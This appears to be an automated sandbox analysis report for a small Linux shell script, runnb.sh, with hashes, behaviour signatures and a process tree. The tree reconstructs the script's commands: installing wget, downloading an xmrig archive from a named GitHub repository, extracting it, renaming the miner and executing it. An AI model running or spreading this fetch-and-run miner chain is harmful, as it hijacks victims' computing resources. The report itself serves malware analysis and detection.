Analysis
-
max time kernel
22s -
max time network
129s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
30-10-2024 21:08
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 1649 chmod -
OS Credential Dumping 1 TTPs 1 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
Processes:
sudodescription ioc process File opened for reading /etc/shadow sudo -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Enumerates kernel/hardware configuration 1 TTPs 8 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
snapsnapsnapsnapsnapsnapsnapsnapdescription ioc process File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap -
Processes:
aptsnapdpkgsnapsudodpkgsnapmvsnapaptdpkgsnapsnapsnapdpkgsnaptardescription ioc process File opened for reading /proc/self/fd apt File opened for reading /proc/cmdline snap File opened for reading /proc/filesystems dpkg File opened for reading /proc/cgroups snap File opened for reading /proc/filesystems sudo File opened for reading /proc/self/stat sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/cgroups snap File opened for reading /proc/cgroups snap File opened for reading /proc/filesystems mv File opened for reading /proc/1/limits sudo File opened for reading /proc/cgroups snap File opened for reading /proc/self/fd apt File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/cgroups snap File opened for reading /proc/cmdline snap File opened for reading /proc/cgroups snap File opened for reading /proc/cmdline snap File opened for reading /proc/cgroups snap File opened for reading /proc/cmdline snap File opened for reading /proc/cmdline snap File opened for reading /proc/filesystems dpkg File opened for reading /proc/cmdline snap File opened for reading /proc/filesystems tar File opened for reading /proc/cmdline snap File opened for reading /proc/cgroups snap File opened for reading /proc/cmdline snap
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:1577
-
/usr/bin/sudosudo apt install wget2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:1578 -
/usr/bin/aptapt install wget3⤵
- Reads runtime system information
PID:1579 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:1580 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:1584 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"4⤵PID:1585
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1586 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"4⤵PID:1591
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1592 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"4⤵PID:1597
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1598 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"4⤵PID:1604
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1605 -
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
PID:1610 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:1611 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:1612 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"3⤵PID:1613
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1614 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"3⤵PID:1622
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1623 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"3⤵PID:1631
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1632 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"3⤵PID:1640
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1641 -
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵PID:1647
-
/usr/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
PID:1648 -
/usr/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:1649 -
/usr/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:1650 -
/tmp/cool./cool2⤵PID:1651